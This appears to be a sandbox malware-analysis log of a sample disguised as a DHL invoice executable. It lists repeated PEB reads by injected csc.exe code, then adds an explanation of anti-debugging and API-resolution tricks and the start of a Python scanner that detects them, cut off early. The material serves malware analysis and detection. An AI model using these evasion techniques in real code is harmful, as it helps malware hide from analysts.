            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057C0283 mov eax, dword ptr fs:[00000030h]4_2_057C0283
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057C0283 mov eax, dword ptr fs:[00000030h]4_2_057C0283
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057C0283 mov eax, dword ptr fs:[00000030h]4_2_057C0283
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057D8D6B mov eax, dword ptr fs:[00000030h]4_2_057D8D6B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_05814DAD mov eax, dword ptr fs:[00000030h]4_2_05814DAD
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_05740D59 mov eax, dword ptr fs:[00000030h]4_2_05740D59
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_05740D59 mov eax, dword ptr fs:[00000030h]4_2_05740D59
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_05740D59 mov eax, dword ptr fs:[00000030h]4_2_05740D59
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_05748D59 mov eax, dword ptr fs:[00000030h]4_2_05748D59
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_05748D59 mov eax, dword ptr fs:[00000030h]4_2_05748D59
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_05748D59 mov eax, dword ptr fs:[00000030h]4_2_05748D59
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_05748D59 mov eax, dword ptr fs:[00000030h]4_2_05748D59
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_05748D59 mov eax, dword ptr fs:[00000030h]4_2_05748D59
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_05808DAE mov eax, dword ptr fs:[00000030h]4_2_05808DAE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_05808DAE mov eax, dword ptr fs:[00000030h]4_2_05808DAE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057C8D20 mov eax, dword ptr fs:[00000030h]4_2_057C8D20
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_05736D10 mov eax, dword ptr fs:[00000030h]4_2_05736D10
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_05736D10 mov eax, dword ptr fs:[00000030h]4_2_05736D10
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_05736D10 mov eax, dword ptr fs:[00000030h]4_2_05736D10
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_05774D1D mov eax, dword ptr fs:[00000030h]4_2_05774D1D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057F8D10 mov eax, dword ptr fs:[00000030h]4_2_057F8D10
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057F8D10 mov eax, dword ptr fs:[00000030h]4_2_057F8D10
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0575AD00 mov eax, dword ptr fs:[00000030h]4_2_0575AD00
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0575AD00 mov eax, dword ptr fs:[00000030h]4_2_0575AD00
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0575AD00 mov eax, dword ptr fs:[00000030h]4_2_0575AD00
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_05736DF6 mov eax, dword ptr fs:[00000030h]4_2_05736DF6
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0576CDF0 mov eax, dword ptr fs:[00000030h]4_2_0576CDF0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0576CDF0 mov ecx, dword ptr fs:[00000030h]4_2_0576CDF0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057E0DF0 mov eax, dword ptr fs:[00000030h]4_2_057E0DF0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057E0DF0 mov eax, dword ptr fs:[00000030h]4_2_057E0DF0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0574ADE0 mov eax, dword ptr fs:[00000030h]4_2_0574ADE0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0574ADE0 mov eax, dword ptr fs:[00000030h]4_2_0574ADE0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0574ADE0 mov eax, dword ptr fs:[00000030h]4_2_0574ADE0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0574ADE0 mov eax, dword ptr fs:[00000030h]4_2_0574ADE0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0574ADE0 mov eax, dword ptr fs:[00000030h]4_2_0574ADE0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0574ADE0 mov eax, dword ptr fs:[00000030h]4_2_0574ADE0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_05760DE1 mov eax, dword ptr fs:[00000030h]4_2_05760DE1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0573CDEA mov eax, dword ptr fs:[00000030h]4_2_0573CDEA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0573CDEA mov eax, dword ptr fs:[00000030h]4_2_0573CDEA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0576EDD3 mov eax, dword ptr fs:[00000030h]4_2_0576EDD3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0576EDD3 mov eax, dword ptr fs:[00000030h]4_2_0576EDD3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057C4DD7 mov eax, dword ptr fs:[00000030h]4_2_057C4DD7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057C4DD7 mov eax, dword ptr fs:[00000030h]4_2_057C4DD7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0577CDB1 mov ecx, dword ptr fs:[00000030h]4_2_0577CDB1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0577CDB1 mov eax, dword ptr fs:[00000030h]4_2_0577CDB1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0577CDB1 mov eax, dword ptr fs:[00000030h]4_2_0577CDB1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_05768DBF mov eax, dword ptr fs:[00000030h]4_2_05768DBF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_05768DBF mov eax, dword ptr fs:[00000030h]4_2_05768DBF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_05776DA0 mov eax, dword ptr fs:[00000030h]4_2_05776DA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0574AC50 mov eax, dword ptr fs:[00000030h]4_2_0574AC50
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0574AC50 mov eax, dword ptr fs:[00000030h]4_2_0574AC50
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0574AC50 mov eax, dword ptr fs:[00000030h]4_2_0574AC50
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0574AC50 mov eax, dword ptr fs:[00000030h]4_2_0574AC50
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0574AC50 mov eax, dword ptr fs:[00000030h]4_2_0574AC50
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0574AC50 mov eax, dword ptr fs:[00000030h]4_2_0574AC50
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_05746C50 mov eax, dword ptr fs:[00000030h]4_2_05746C50
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_05746C50 mov eax, dword ptr fs:[00000030h]4_2_05746C50
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_05746C50 mov eax, dword ptr fs:[00000030h]4_2_05746C50
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_05774C59 mov eax, dword ptr fs:[00000030h]4_2_05774C59
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057E4C34 mov eax, dword ptr fs:[00000030h]4_2_057E4C34
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057E4C34 mov eax, dword ptr fs:[00000030h]4_2_057E4C34
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057E4C34 mov eax, dword ptr fs:[00000030h]4_2_057E4C34
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057E4C34 mov eax, dword ptr fs:[00000030h]4_2_057E4C34
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057E4C34 mov eax, dword ptr fs:[00000030h]4_2_057E4C34
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057E4C34 mov eax, dword ptr fs:[00000030h]4_2_057E4C34
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057E4C34 mov ecx, dword ptr fs:[00000030h]4_2_057E4C34
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0573EC20 mov eax, dword ptr fs:[00000030h]4_2_0573EC20
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057DCC20 mov eax, dword ptr fs:[00000030h]4_2_057DCC20
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057DCC20 mov eax, dword ptr fs:[00000030h]4_2_057DCC20
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057C4C0F mov eax, dword ptr fs:[00000030h]4_2_057C4C0F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_05750C00 mov eax, dword ptr fs:[00000030h]4_2_05750C00
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_05750C00 mov eax, dword ptr fs:[00000030h]4_2_05750C00
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_05750C00 mov eax, dword ptr fs:[00000030h]4_2_05750C00
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_05750C00 mov eax, dword ptr fs:[00000030h]4_2_05750C00
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0577CC00 mov eax, dword ptr fs:[00000030h]4_2_0577CC00
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_05772CF0 mov eax, dword ptr fs:[00000030h]4_2_05772CF0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_05772CF0 mov eax, dword ptr fs:[00000030h]4_2_05772CF0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_05772CF0 mov eax, dword ptr fs:[00000030h]4_2_05772CF0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_05772CF0 mov eax, dword ptr fs:[00000030h]4_2_05772CF0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0573CCC8 mov eax, dword ptr fs:[00000030h]4_2_0573CCC8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_05768CB1 mov eax, dword ptr fs:[00000030h]4_2_05768CB1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_05768CB1 mov eax, dword ptr fs:[00000030h]4_2_05768CB1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057F0CB5 mov eax, dword ptr fs:[00000030h]4_2_057F0CB5
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057F0CB5 mov eax, dword ptr fs:[00000030h]4_2_057F0CB5
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057F0CB5 mov eax, dword ptr fs:[00000030h]4_2_057F0CB5
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057F0CB5 mov eax, dword ptr fs:[00000030h]4_2_057F0CB5
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057F0CB5 mov eax, dword ptr fs:[00000030h]4_2_057F0CB5
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057F0CB5 mov eax, dword ptr fs:[00000030h]4_2_057F0CB5
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057F0CB5 mov eax, dword ptr fs:[00000030h]4_2_057F0CB5
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057F0CB5 mov eax, dword ptr fs:[00000030h]4_2_057F0CB5
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057F0CB5 mov eax, dword ptr fs:[00000030h]4_2_057F0CB5
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057F0CB5 mov eax, dword ptr fs:[00000030h]4_2_057F0CB5
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057F0CB5 mov eax, dword ptr fs:[00000030h]4_2_057F0CB5
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057F0CB5 mov eax, dword ptr fs:[00000030h]4_2_057F0CB5
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057F0CB5 mov eax, dword ptr fs:[00000030h]4_2_057F0CB5
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057BCCA0 mov ecx, dword ptr fs:[00000030h]4_2_057BCCA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057BCCA0 mov eax, dword ptr fs:[00000030h]4_2_057BCCA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057BCCA0 mov eax, dword ptr fs:[00000030h]4_2_057BCCA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057BCCA0 mov eax, dword ptr fs:[00000030h]4_2_057BCCA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_05738C8D mov eax, dword ptr fs:[00000030h]4_2_05738C8D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0576AF69 mov eax, dword ptr fs:[00000030h]4_2_0576AF69
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_0576AF69 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_0573CF50 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_0573CF50 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_0573CF50 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_0573CF50 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_0573CF50 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_0573CF50 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_0577CF50 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_057E0F50 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_057C4F40 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_057C4F40 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_057C4F40 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_057C4F40 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_057E4F42 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_0576EF28 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_05742F12 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_05814FE7 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_0577CF1F mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_057F6F00 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_057F6FF7 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_05780FF6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_05780FF6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_05780FF6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_05780FF6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_0573EFD8 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_0573EFD8 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_0573EFD8 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_05742FC8 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_05742FC8 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_05742FC8 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_05742FC8 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_05814F68 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_05772F98 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_05772F98 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_0577CF80 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_057C0E7F mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_057C0E7F mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_057C0E7F mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_05746E71 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_057D6E20 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_057D6E20 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_057D6E20 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_05738E1D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_0576AE00 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_0576AE00 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_0576AE00 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_0576AE00 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_0576AE00 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_0576AE00 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_0576AE00 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_0576AE00 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_0576AE00 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_0576AE00 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_05778EF5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_05746EE0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_05746EE0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_05746EE0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_05746EE0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_057DAEB0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_057DAEB0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_05812E4F mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_05812E4F mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_057CCEA0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_057CCEA0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_057CCEA0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_0573AE90 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_0573AE90 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_0573AE90 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_05772E9C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_05772E9C mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_057CC97C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_057E4978 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_057E4978 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_05766962 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_05766962 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_05766962 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_0578096E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_0578096E mov edx, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_0578096E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_057C0946 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_0580A9D3 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_057C892A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_057D892B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 4_2_05738918 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
            Source: C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe | Memory allocated: page read and write | page guard
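            The csc.exe rows above record dozens of reads of dword ptr fs:[30h]. On 32-bit Windows that TEB slot holds the PEB pointer, and code injected into csc.exe reads the PEB for two reasons: anti-debugging (PEB.BeingDebugged at offset 0x02, PEB.NtGlobalFlag at 0x68) and resolving APIs by walking PEB.Ldr (0x0C) so the payload needs no import table. The scanner below is an added example, not part of the Joe Sandbox report: it finds the x86 encodings of mov r32, fs:[30h] in a code buffer such as the unpacked 4.2.csc.exe.400000.0.unpack dump and labels the PEB field the next instruction reads. The SAMPLE bytes are constructed for the demonstration and are not taken from the analysed file.

```python
"""Locate x86 PEB reads (mov r32, fs:[30h]) in a code buffer and label the PEB field read next.
Added example; the SAMPLE bytes are constructed, not taken from the analysed file."""

REG_NAMES = ["eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"]
PEB_PTR_DISP = b"\x30\x00\x00\x00"   # fs:[30h] = TEB.ProcessEnvironmentBlock on 32-bit Windows

# Well-known x86 PEB field offsets that anti-debugging and import-resolution code reads next.
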